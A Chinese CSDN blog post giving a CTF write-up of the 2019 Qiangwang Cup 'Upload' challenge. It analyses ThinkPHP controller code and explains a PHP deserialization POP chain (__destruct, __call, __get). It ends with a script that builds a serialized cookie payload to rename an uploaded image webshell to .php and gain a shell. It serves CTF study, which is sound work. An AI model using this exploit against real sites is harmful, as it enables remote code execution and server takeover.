2019强网杯web upload分析

最新推荐文章于 2023-11-12 23:00:01 发布
最新推荐文章于 2023-11-12 23:00:01 发布
阅读量1.2k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41173457/article/details/90724943
版权 
<?php
namespace app\web\controller;
use think\Controller;

class Register extends Controller
{
    public $checker;
    public $registed;

    public function __construct()
    {
        $this->checker=new Index();
    }

    public function register()
    {
        if ($this->checker) {
            if($this->checker->login_check()){
                $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/home";
                $this->redirect($curr_url,302);
                exit();
            }
        }
        if (!empty(input("post.username")) && !empty(input("post.email")) && !empty(input("post.password"))) {
            $email = input("post.email", "", "addslashes");
            $password = input("post.password", "", "addslashes");
            $username = input("post.username", "", "addslashes");
            if($this->check_email($email)) {
                if (empty(db("user")->where("username", $username)->find()) && empty(db("user")->where("email", $email)->find())) {
                    $user_info = ["email" => $email, "password" => md5($password), "username" => $username];
                    if (db("user")->insert($user_info)) {
                        $this->registed = 1;
                        $this->success('Registed successful!', url('../index'));
                    } else {
                        $this->error('Registed failed!', url('../index'));
                    }
                } else {
                    $this->error('Account already exists!', url('../index'));
                }
            }else{
                $this->error('Email illegal!', url('../index'));
            }
        } else {
            $this->error('Something empty!', url('../index'));
        }
    }

    public function check_email($email){
        $pattern = "/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,})$/";
        preg_match($pattern, $email, $matches);
        if(empty($matches)){
            return 0;
        }else{
            return 1;
        }
    }

    public function __destruct()
    {
        if(!$this->registed){   
            $this->checker->index();
        }
    }


}

<?php
namespace app\web\controller;

use think\Controller;

class Profile extends Controller
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;

    public function __construct()
    {
        $this->checker=new Index();
        $this->upload_menu=md5($_SERVER['REMOTE_ADDR']);
        @chdir("../public/upload");
        if(!is_dir($this->upload_menu)){
            @mkdir($this->upload_menu);
        }
        @chdir($this->upload_menu);
    }

    public function upload_img(){
        if($this->checker){
            if(!$this->checker->login_check()){
                $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
                $this->redirect($curr_url,302);
                exit();
            }
        }

        if(!empty($_FILES)){
            $this->filename_tmp=$_FILES['upload_file']['tmp_name'];
            $this->filename=md5($_FILES['upload_file']['name']).".png";
            $this->ext_check();
        }
        if($this->ext) {
            if(getimagesize($this->filename_tmp)) {
                @copy($this->filename_tmp, $this->filename);
                @unlink($this->filename_tmp);
                $this->img="../upload/$this->upload_menu/$this->filename";
                $this->update_img();
            }else{
                $this->error('Forbidden type!', url('../index'));
            }
        }else{
            $this->error('Unknow file type!', url('../index'));
        }
    }

    public function update_img(){
        $user_info=db('user')->where("ID",$this->checker->profile['ID'])->find();
        if(empty($user_info['img']) && $this->img){
            if(db('user')->where('ID',$user_info['ID'])->data(["img"=>addslashes($this->img)])->update()){
                $this->update_cookie();
                $this->success('Upload img successful!', url('../home'));
            }else{
                $this->error('Upload file failed!', url('../index'));
            }
        }
    }

    public function update_cookie(){
        $this->checker->profile['img']=$this->img;
        cookie("user",base64_encode(serialize($this->checker->profile)),3600);
    }

    public function ext_check(){
        $ext_arr=explode(".",$this->filename);
        $this->ext=end($ext_arr);
        if($this->ext=="png"){
            return 1;
        }else{
            return 0;
        }
    }

    public function __get($name)
    {
        return $this->except[$name];
    }

    public function __call($name, $arguments)
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

}

                @copy($this->filename_tmp, $this->filename);
                @unlink($this->filename_tmp);
                $this->img="../upload/$this->upload_menu/$this->filename";

if(!$this->registed){   
            $this->checker->index();

registed 赋值为0

filename_tmp 传上去的一个图片木马
filename 修改为php后缀

if($this->ext) { ext=1
if(!empty($_FILES)){ 不上传文件 绕过 /这里是判断请求中是否在有文件上传的请求
if($this->checker){ if(!$this->checker->login_check()){ 这里会检查是否登陆

目标 调用 profile类中的 upload_img函数
register类

    public function __construct()
    {
        $this->checker=new Index();
    }
    public function __destruct()
    {
        if(!$this->registed){   
            $this->checker->index();
        }
    }

register中checker赋值 new profile() new一个profile类
then
__destruct() 调用 profile中的index函数
但是profile类中 没有index函数
触发profile类中的 __call 方法

name变量 即为index

//$name 为不存在的成员方法名称,$arguments 传入此方法的参数
{$name} 为index
$this->index

//在执行到这个模式方法中的 if 语句的判断时,if($this->index) ,Profile 类不存在 index 属性,所以又去调用__get 方法

except[index]
// 所以这里我们只要控制 $this->except 这个属性的内容就能执行任意成员方法
except = [‘index’=>‘upload_img’]
// 本例中,我们可以在序列化的时候让 $this->except = ['index'=>'upload_img']
$this->{$this->{$name}}($arguments); 这里相当于就是执行了 $this->upload_img(),这样就达到了我们的目的,更改完成了上传的图片马的名称,使我们可以 getshell
index方法不存在
index属性不存在
相当于 index映射到upload_img index就是upload_img
调用index方法不存在 那就调用upload_img 方法吧

    public function __get($name)
    {
        return $this->except[$name];
    }

    public function __call($name, $arguments)
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

pop链
index类login_check函数 unserialize 反序列化
Register类 和 profile类
register类 __construct方法
new profile类
__destruct()方法
调用profile类 中index方法
profile类中不存在index方法
自动调用profile类中call方法
then调用profile类中get方法
构造except 调用upload_img方法
绕过两个if
then
filename_tmp
filename 构造
改名为php后缀
成功

<?php
namespace app\web\controller;

class Profile
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;

}
class Register
{
    public $checker;
    public $registed;
}
$a = new Register();
$a->registed = 0;
$a->checker = new Profile();
$a->checker->except = ['index'=>'upload_img'];
$a->checker->filename_tmp = './upload/bc9c0f21801e3928b868149bfb65e408/fb5c81ed3a220004b71069645f112867.png';
$a->checker->filename = './upload/bc9c0f21801e3928b868149bfb65e408/2.php';
$a->checker->ext = 1;


echo base64_encode(serialize($a));
woy66
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反序列化(强网杯2019UPLOAD
kid的博客
05-29 5879
反序列化(强网杯2019UPLOAD) 前言 这里主要是复现一下强网杯2019web的第一题,UPLOAD。这是一道反序列化的题,反正我觉得挺难的,当时已经锁定了反序列化的方向也没能完成… 感谢大佬提供的复现环境:https://github.com/CTFTraining/qwb_2019_upload UPLOAD 进入靶场后首先是一个登陆注册页面 这里很自然的要想到有没有注入,简单的万能...
[强网杯 2019]Upload wp
qq_41891666的博客
07-16 1552
0x00 前言 本来是在刷 文件上传的题,然后没想到强网杯这个题打着upload 的幌子其实是个反序列化题,看了看wp 后,觉得很有意思,值得记录一下 0x01 题解 1.首先用户登录后的 cookie 是一串加密的内容,很可疑,base64 解密之后,发现是序列化的内容 2.dirmap 扫目录,扫到源码,/www.tar.gz 下载之后发现里面包含源码,以及.idea 文件,phpstorm 打开发现断点,估计是出题人故意留的提示 3.审计源码 先看两个断点处: login_check() 函数
[BUUCTF][强网杯 2019]Upload
cosmoslin的博客
01-22 1854
考点 代码审计 反序列化 解题 信息搜集 首先打开是一个登录框,尝试sql无果 注册登录,发现一个文件上传页面 先试试文件上传,会将jpg文件转换为png,文件名随机生成 dirsearch扫一下目录,有备份文件www.tar.gz 解压后是一个tp5的框架 代码审计 打开文件后有两个断点 application/web/controller/Index.php 在访问大部分页面时都会调用到login_check方法,该方法将传入的用户信息反序列化,再到数据库中进行检查 application/web
[强网杯 2019]Upload
qq_62046696的博客
12-17 907
except是一个数组,正好我们想要调用的这个public function upload_img()也是在同一个类中,那个我们给 index赋值 upload_img这个方法不就可以了吗。发现是序列化,那么肯定会有反序列化的地方目前还没遇到,也没提示的点了,扫一下目录,扫到了www.tar.gz。if($this->{$name}){//成为了这里的属性,而类中不存在index属性。//如果我们能控制,指定路径的目录名称,然后传一个图片码不就可以getshell了码。
2019强网杯upload
m0_61448651的博客
07-21 635
2019强网杯upload
强网杯-upload1
08-08
在"强网杯-upload1"这个挑战中,我们面对的是一个网络安全相关的解题任务。题目提供的数据是一个名为"data.pcapng"的网络流量捕获文件,这类文件通常用于分析网络通信中的数据包。使用Wireshark这样的网络封包分析...
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
webupload完整上传程序
12-04
【标题】"WebUpload完整上传程序"是一款专为.NET Core MVC框架设计的文件上传解决方案,旨在简化在ASP.NET环境中处理用户文件上传的过程。这个程序集成了高效、安全且易于使用的特性,使得开发者能够轻松地在自己的...
webupload附件上传
12-14
WebUpload是一款广泛应用于Web开发中的前端文件上传组件,它的出现极大地简化了网页中复杂繁琐的文件上传流程。这款工具以其便捷性、实用性和兼容性深受开发者喜爱,尤其适合需要处理大量用户上传附件的项目。 首先...
WebUpload_0.1.5 上传插件
11-29
WebUploader是由Baidu WebFE(FEX)团队开发的一个简单的以HTML5为主,FLASH为辅的现代文件上传组件。在现代的浏览器里面能充分发挥HTML5的优势,同时又不摒弃主流IE浏览器,沿用原来的FLASH运行时,兼容IE6+,iOS 6+,...
强网杯 2019 Upload(代码审计、反序列化、thinkphp5,附代码审计详解
最新发布
2301_76690905的博客
11-12 185
首先看到登录和注册页面,爆破了一下admin登录界面无事发生,注册后登录看见一个上传头像的上传点(不知道是不是容器原因,上传完第一次后上传不了第二次一直显示连接不上),扫了下目录扫出一些文件,其中有用的是www.tar.gz打开压缩包能看见是th5,查看查看看到其定义的路由都指向了这个模块,该模块下共有四个控制器(四个文件的审计在最后)关键的点在于:Index.php中的login_check()中,有一处使用了反序列化,并且没有进行任何过滤寻找别的魔术方法Register.php中:Profile.php
2020第四届强网杯部分WP
李熠专用博客_白帽子一枚,人称低危终结者
08-24 1303
题目序号 主动 操作内容: 进入网址,阅读源码,发现是个命令执行的题。 先尝试ls命令列出所有文件,发现存在flag.php文件,猜测flag在该文件中。 然后尝试读取flag.php文件,但是正则匹配了flag关键词,需要使用通配符绕过,如:fla?.php,但是尝试cat、tail、head、more文件读取命令均无效,最后使用tac命令拿到flag。 flag值: flag{I_like_qwb_web} 题目序号 Funhash 操作内容: 进入网址,开始阅读源码,发现需要绕过三个不同的限制方
BUUCTF:[强网杯 2019]Upload
末初的CSDN博客
03-27 3237
参考:https://www.zhaoj.in/read-5873.html 稍微测试了一下,不存在注入或者万能密码登录,先注册登录 先传一句话木马图片上去看看 上传的是一张jpg的图片,传上去之后被改后缀为png,而且可以看到路径和文件名都进行了重命名使用md5值 目录扫描出一个www.tar.gz在网站根目录,使用phpstorm打开,发现是ThinkPHP5框架 而且存在....
2019强网杯部分writeup
Sea_Sand息禅
06-04 5556
Web 1、UPLOAD 复现环境https://github.com/CTFTraining/qwb_2019_upload 先看一下网站情况: 是一个注册可登录的界面,登陆之后可以上传图片,一个账号只能上传一次。 扫一下后台目录,发现upload是泄露的,www.tar.gz是泄露的。 www.tar.gz下载下来是网站的源码,upload则是我们上传的文件,找到上传文件的源码: &lt...
2019第三届强网杯-强网先锋-ADwp
or1d1的博客
05-27 5015
周末参加了一下强网杯,emmm这些题目不是我等弟弟所能解答的。 鲲or鳗orGame题目wphttps://blog.csdn.net/or1d1/article/details/90599659 其他大佬的wp https://skysec.top/2019/05/25/2019-%E5%BC%BA%E7%BD%91%E6%9D%AFonline-Web-Writeup/#uploa...
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ```php error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] . " "; } else { echo "Upload: " . $_FILES[...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值